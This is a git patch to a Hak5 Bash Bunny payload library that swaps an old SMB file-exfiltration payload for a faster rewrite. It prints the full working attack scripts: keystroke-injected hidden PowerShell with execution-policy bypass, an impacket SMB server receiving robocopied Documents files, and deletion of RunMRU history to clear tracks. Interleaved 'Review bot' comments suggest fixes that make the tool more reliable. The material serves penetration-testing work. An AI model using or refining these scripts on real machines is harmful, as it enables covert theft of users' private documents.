From 4346b86ecd42d65f5c4bf0415a8f3a7d999b2a38 Mon Sep 17 00:00:00 2001
From: Darren Kitchen
Date: Fri, 7 Apr 2017 14:56:51 +1000
Subject: [PATCH] Removed old smb_exfiltrator payload and renamed faster_smb_exfiltrator

Old version is now deprecated. I'll eventually merge the older technique into the existing smb_exfiltrator with execution options.
---
 .../faster_smb_exfiltrator/payload.txt | 93 ------------
 .../library/faster_smb_exfiltrator/readme.md | 37 -----
 payloads/library/smb_exfiltrator/payload.txt | 142 ++++++++----------
 payloads/library/smb_exfiltrator/readme.md | 34 +++--
 .../s.ps1 | 14 +-
 5 files changed, 87 insertions(+), 233 deletions(-)
 delete mode 100644 payloads/library/faster_smb_exfiltrator/payload.txt
 delete mode 100644 payloads/library/faster_smb_exfiltrator/readme.md
 rename payloads/library/{faster_smb_exfiltrator => smb_exfiltrator}/s.ps1 (98%)

diff --git a/payloads/library/faster_smb_exfiltrator/payload.txt b/payloads/library/faster_smb_exfiltrator/payload.txt
deleted file mode 100644
index 76479fa..0000000
--- a/payloads/library/faster_smb_exfiltrator/payload.txt
+++ /dev/null
@@ -1,93 +0,0 @@ -#!/bin/bash -# -# Title: Faster SMB Exfiltrator -# Author: Hak5Darren -# Props: ImNatho, mike111b, madbuda -# Version: 1.0 -# Category: Exfiltration -# Target: Windows XP SP3+ (Powershell) -# Attackmodes: HID, Ethernet -# -# Rewrite of the original SMB Exfiltrator payload with: -# - Faster copying, using robocopy multithreaded mode -# - Faster finish, using a EXFILTRATION_COMPLETE file -# - Offload logic to target PC for accurate date/time -# - Clears tracks by default without second run dialog -# - Test-Connection handling by ICMP (no lame sleeps) -# - Hidden powershell window by default -# -# LED Status -# Red Blinking.........Failed to find dependencies -# Purple Blinking......HID Stage -# Purple...............Ethernet Stage -# Blue/Purple..........Receiving Files -# White................Moving Liberated Files -# Green................Finished -# -# OPTIONS: configured from s.ps1 - - - -######## INITIALIZATION ######## -# Check for impacket. If not found, blink fast red. -if [ ! 
-d /pentest/impacket/ ]; then - LED R 100 - exit 1 -fi - - - -######## SETUP ######## -# Get switch position from bunny helpers -source bunny_helpers.sh -# Make temporary loot directory -mkdir -p /loot/smb/ -# Delete any old exfiltration data -rm -rf /loot/smb/* -# Copy new powershell payload to smb share -cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ -# Make loot directory on USB Disk -mkdir -p /root/udisk/loot/smb_exfiltrator -# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) -echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all - - - -######## HID STAGE ######## -# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available -LED R B 500 -ATTACKMODE HID -QUACK GUI r -QUACK DELAY 500 -QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" -QUACK ENTER - - - -######## ETHERNET STAGE ######## -LED R B -ATTACKMODE RNDIS_ETHERNET -# Start the SMB Server -/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & -# Re-enable ICMP/echo replies to trip the powershell stager -echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all -# Wait until files are done copying. -while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done - - - -######## CLEANUP ######## -LED R G B -# Delete EXFILTRATION_COMPLETE file -rm -rf /loot/smb/EXFILTRATION_COMPLETE -# Move files to udisk loot directory -mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator -# Clean up temporary loot directory -rm -rf /loot/smb/e/* -# Sync file system -sync; sleep 1; sync - - - -######## FINISH ######## -LED G # Trap is clean \ No newline at end of file 
diff --git a/payloads/library/faster_smb_exfiltrator/readme.md b/payloads/library/faster_smb_exfiltrator/readme.md
deleted file mode 100644
index 34529a9..0000000
--- a/payloads/library/faster_smb_exfiltrator/readme.md
+++ /dev/null
@@ -1,37 +0,0 @@
-# Faster SMB Exfiltrator
-
-* Author: Hak5Darren
-* Props: ImNatho, mike111b, madbuda
-* Version: Version 1.0
-* Target: Windows XP SP3+ (Powershell)
-* Category: Exfiltration
-* Attackmodes: HID, Ethernet
-
-## Description
-
-Exfiltrates select files from users's documents folder via SMB.
-Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
-
-Rewrite of the original SMB Exfiltrator payload with:
-* Faster copying, using robocopy multithreaded mode
-* Faster finish, using a EXFILTRATION_COMPLETE file
-* Offload logic to target PC for accurate date/time
-* Clears tracks by default without second run dialog
-* Test-Connection handling by ICMP (no lame sleeps)
-* Hidden powershell window by default
-
-
-## Configuration
-
-Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired.
-
-## STATUS
-
-| LED | Status |
-| ------------------- | -------------------------------------- |
-| Red (blinking) | Impacket not found in /pentest |
-| Magenta (blinking) | HID Stage |
-| Magenta | Ethernet Stage |
-| Magenta/Blue | Receiving files |
-| White | Moving liberated files to mass storage |
-| Green | Finished |
\ No newline at end of file
diff --git a/payloads/library/smb_exfiltrator/payload.txt b/payloads/library/smb_exfiltrator/payload.txt
index 850bfa8..76479fa 100644
--- a/payloads/library/smb_exfiltrator/payload.txt
+++ b/payloads/library/smb_exfiltrator/payload.txt
@@ -1,31 +1,34 @@ #!/bin/bash # -# Title: SMB Exfiltrator +# Title: Faster SMB Exfiltrator # Author: Hak5Darren +# Props: ImNatho, mike111b, madbuda # Version: 1.0 # Category: Exfiltration # Target: Windows XP SP3+ (Powershell) # Attackmodes: HID, Ethernet +# +# Rewrite of the original SMB Exfiltrator payload with: +# - Faster copying, using robocopy multithreaded mode +# - Faster finish, using a EXFILTRATION_COMPLETE file +# - Offload logic to target PC for accurate date/time +# - Clears tracks by default without second run dialog +# - Test-Connection handling by ICMP (no lame sleeps) +# - Hidden powershell window by default # -# -# Red Blink Fast.......Impacket not found -# Red Blink Slow.......Target did not acquire IP address -# Amber Blink Fast.....Initialization -# Amber................HID Stage -# Purple Blink Fast....Ethernet Stage -# Blue Interstitial....Receiving Files -# White................Moving loot to mass storage +# LED Status +# Red Blinking.........Failed to find dependencies +# Purple Blinking......HID Stage +# Purple...............Ethernet Stage +# Blue/Purple..........Receiving Files +# White................Moving Liberated Files # Green................Finished # -# OPTIONS -LOOTDIR=/root/udisk/loot/smb_exfiltrator -EXFILTRATE_FILES="*.pdf" -CLEARTRACKS="yes" # yes or no - -# Initialization -LED R G 100 +# OPTIONS: configured from s.ps1 + +######## INITIALIZATION ######## # Check for impacket. If not found, blink fast red. if [ ! -d /pentest/impacket/ ]; then LED R 100 
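Review bot: The INITIALIZATION block introduced here checks only for `/pentest/impacket/`, but the new LED legend above it reads `Red Blinking.........Failed to find dependencies` and the payload now also depends on `s.ps1`, which the SETUP block in the next hunk copies with `cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/` and no error check. If s.ps1 was not placed in the switch directory that copy fails silently, the HID stage still types the stager, and the script then sits in the `EXFILTRATION_COMPLETE` wait loop indefinitely instead of signalling a failure. Adding `[ -f "/root/udisk/payloads/$SWITCH_POSITION/s.ps1" ] || { LED R 100; exit 1; }` next to the impacket test would make the legend truthful; it has to come after `source bunny_helpers.sh`, which the next hunk's comment says supplies the switch position, so that line would need to move ahead of the check. The `if` opened at the end of this hunk is closed in the next one.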
@@ -33,83 +36,58 @@ if [ ! -d /pentest/impacket/ ]; then fi -# HID STAGE -# Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1. -# Once found, initiates file copy and exits -LED R G + +######## SETUP ######## +# Get switch position from bunny helpers +source bunny_helpers.sh +# Make temporary loot directory +mkdir -p /loot/smb/ +# Delete any old exfiltration data +rm -rf /loot/smb/* +# Copy new powershell payload to smb share +cp /root/udisk/payloads/$SWITCH_POSITION/s.ps1 /loot/smb/ +# Make loot directory on USB Disk +mkdir -p /root/udisk/loot/smb_exfiltrator +# Disable ICMP/echo replies so our powershell stager doesn't attempt to access the SMB share before smbserver starts (workaround since Test-NetConnection 172.16.64.1 SMB only works on powershell 4.0+ for Windows 8+) +echo "1" > /proc/sys/net/ipv4/icmp_echo_ignore_all + + + +######## HID STAGE ######## +# Runs hidden powershell which executes \\172.16.64.1\s\s.ps1 when available +LED R B 500 ATTACKMODE HID QUACK GUI r QUACK DELAY 500 -QUACK STRING "powershell -WindowStyle Hidden \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; net use \\\172.16.64.1\e guest /USER:guest; robocopy \$ENV:UserProfile\Documents \\\172.16.64.1\e $EXFILTRATE_FILES /S; exit } }\"" +QUACK STRING "powershell -WindowStyle Hidden -Exec Bypass \"while (\$true) { If (Test-Connection 172.16.64.1 -count 1) { \\\172.16.64.1\s\s.ps1; exit } }\"" QUACK ENTER -# Clear tracks? 
-if [ $CLEARTRACKS == "yes" ]; then - QUACK DELAY 500 - QUACK GUI r - QUACK DELAY 500 - QUACK STRING powershell -WindowStyle Hidden -Exec Bypass "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" - QUACK ENTER -fi -# ETHERNET STAGE -LED R B 100 +######## ETHERNET STAGE ######## +LED R B ATTACKMODE RNDIS_ETHERNET +# Start the SMB Server +/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' s /loot/smb >> /loot/smbserver.log & +# Re-enable ICMP/echo replies to trip the powershell stager +echo "0" > /proc/sys/net/ipv4/icmp_echo_ignore_all +# Wait until files are done copying. +while ! [ -f /loot/smb/EXFILTRATION_COMPLETE ]; do LED B; sleep 0.5; LED R B; sleep 0.5; done -# Setup SMB server to receive loot in staging area -mkdir -p /root/loot/smb_exfiltrator/temp/ -# house cleaning -rm -rf /root/loot/smb_exfiltrator/temp/* -# Fire up SMB Server -/pentest/impacket/examples/smbserver.py -comment 'That Place Where I Put That Thing That Time' e /root/loot/smb_exfiltrator/temp/ & - -# Source bunny_helpers.sh to get environment variables -source bunny_helpers.sh - - -# Give target a chance to start exfiltration -sleep 2 - - -# Make loot directory based on hostname (increment for multiple uses) -mkdir -p $LOOTDIR -HOST=${TARGET_HOSTNAME} -# If hostname is blank set it to "noname" -[[ -z "$HOST" ]] && HOST="noname" -COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l) -COUNT=$((COUNT+1)) -mkdir -p $LOOTDIR/$HOST-$COUNT - - -# Check target IP address. If unset, blink slow red. -if [ -z "${TARGET_IP}" ]; then - LED R 1000 - exit 1 -fi - - -# Wait until exfiltration is complete -last=0 -current=1 -while [ "$last" != "$current" ]; do - last=$current - current=$(find /root/loot/smb_exfiltrator/temp/ -exec stat -c "%Y" \{\} \; | sort -n | tail -1) - LED B - sleep 1 - LED R B 100 - sleep 9 - # Files are still being copied. Loop. 
- # (Issue may exist if file takes longer than 10s to copy) -done - - -# Move files from staging area to loot directory +######## CLEANUP ######## LED R G B -mv /root/loot/smb_exfiltrator/temp/* $LOOTDIR/$HOST-$COUNT +# Delete EXFILTRATION_COMPLETE file +rm -rf /loot/smb/EXFILTRATION_COMPLETE +# Move files to udisk loot directory +mv /loot/smb/e/* /root/udisk/loot/smb_exfiltrator +# Clean up temporary loot directory +rm -rf /loot/smb/e/* +# Sync file system sync; sleep 1; sync -# Trap is clean -LED G + + +######## FINISH ######## +LED G # Trap is clean \ No newline at end of file diff --git a/payloads/library/smb_exfiltrator/readme.md b/payloads/library/smb_exfiltrator/readme.md index d567888..34529a9 100644 --- a/payloads/library/smb_exfiltrator/readme.md +++ b/payloads/library/smb_exfiltrator/readme.md 
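Review bot: The `smbserver.py ... &` line in the ETHERNET STAGE discards the background PID, and nothing in CLEANUP or FINISH stops the server, so after the green LED the share on `/loot/smb` (started with no credential options on this command line) stays exported for as long as the device is powered. Capturing `smb_pid=$!` on that line and putting `kill "$smb_pid"` at the top of CLEANUP, before the `mv`, limits the share's lifetime to the copy window and also lets a later run start cleanly. Minor style points in the same hunk: `$SWITCH_POSITION` in the `cp` is unquoted, and `rm -rf` on the single `EXFILTRATION_COMPLETE` file could be `rm -f`. The `fi` at the top of this hunk closes an `if` that begins in the previous hunk.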
@@ -1,31 +1,37 @@
-# SMB Exfiltrator
+# Faster SMB Exfiltrator
 
 * Author: Hak5Darren
+* Props: ImNatho, mike111b, madbuda
 * Version: Version 1.0
 * Target: Windows XP SP3+ (Powershell)
 * Category: Exfiltration
 * Attackmodes: HID, Ethernet
-
+
 ## Description
 
 Exfiltrates select files from users's documents folder via SMB.
-Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME-#
+Liberated documents will reside in Bash Bunny loot directory under loot/smb_exfiltrator/HOSTNAME/DATE_TIME
+
+Rewrite of the original SMB Exfiltrator payload with:
+* Faster copying, using robocopy multithreaded mode
+* Faster finish, using a EXFILTRATION_COMPLETE file
+* Offload logic to target PC for accurate date/time
+* Clears tracks by default without second run dialog
+* Test-Connection handling by ICMP (no lame sleeps)
+* Hidden powershell window by default
+
 
 ## Configuration
 
-Configured to copy PDF files by default. Change EXFILTRATE_FILES variable to desired.
+Configured to copy docx files by default. Change $exfil_ext in s.ps1 to desired.
 
 ## STATUS
 
 | LED | Status |
 | ------------------- | -------------------------------------- |
-| Red (fast blink) | Impacket not found in /pentest |
-| Red (slow blink) | Setup Failed. Target didn't obtain IP |
-| Purple | HID Stage |
-| Purple (fast blink) | Ethernet Stage |
-| Blue (interupt) | Receiving files |
-| White | Files received, moving to mass storage |
-| Green | Finished |
-
-## Discussion
-[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40509-payload-smb-exfiltrator/ "Hak5 Forum Thread")
+| Red (blinking) | Impacket not found in /pentest |
+| Magenta (blinking) | HID Stage |
+| Magenta | Ethernet Stage |
+| Magenta/Blue | Receiving files |
+| White | Moving liberated files to mass storage |
+| Green | Finished |
\ No newline at end of file
diff --git a/payloads/library/faster_smb_exfiltrator/s.ps1 b/payloads/library/smb_exfiltrator/s.ps1
similarity index 98%
rename from payloads/library/faster_smb_exfiltrator/s.ps1
rename to payloads/library/smb_exfiltrator/s.ps1
index f1012b6..88a3e5a 100644
--- a/payloads/library/faster_smb_exfiltrator/s.ps1
+++ b/payloads/library/smb_exfiltrator/s.ps1
@@ -1,7 +1,7 @@
-$exfil_dir="$Env:UserProfile\Documents"
-$exfil_ext="*.docx"
-$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
-mkdir $loot_dir
-robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
-New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
-Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
+$exfil_dir="$Env:UserProfile\Documents"
+$exfil_ext="*.docx"
+$loot_dir="\\172.16.64.1\s\e\$Env:ComputerName\$((Get-Date).ToString('yyyy-MM-dd_hhmmtt'))"
+mkdir $loot_dir
+robocopy $exfil_dir $loot_dir $exfil_ext /S /MT /Z
+New-Item -Path \\172.16.64.1\s -Name "EXFILTRATION_COMPLETE" -Value "EXFILTRATION_COMPLETE"
+Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue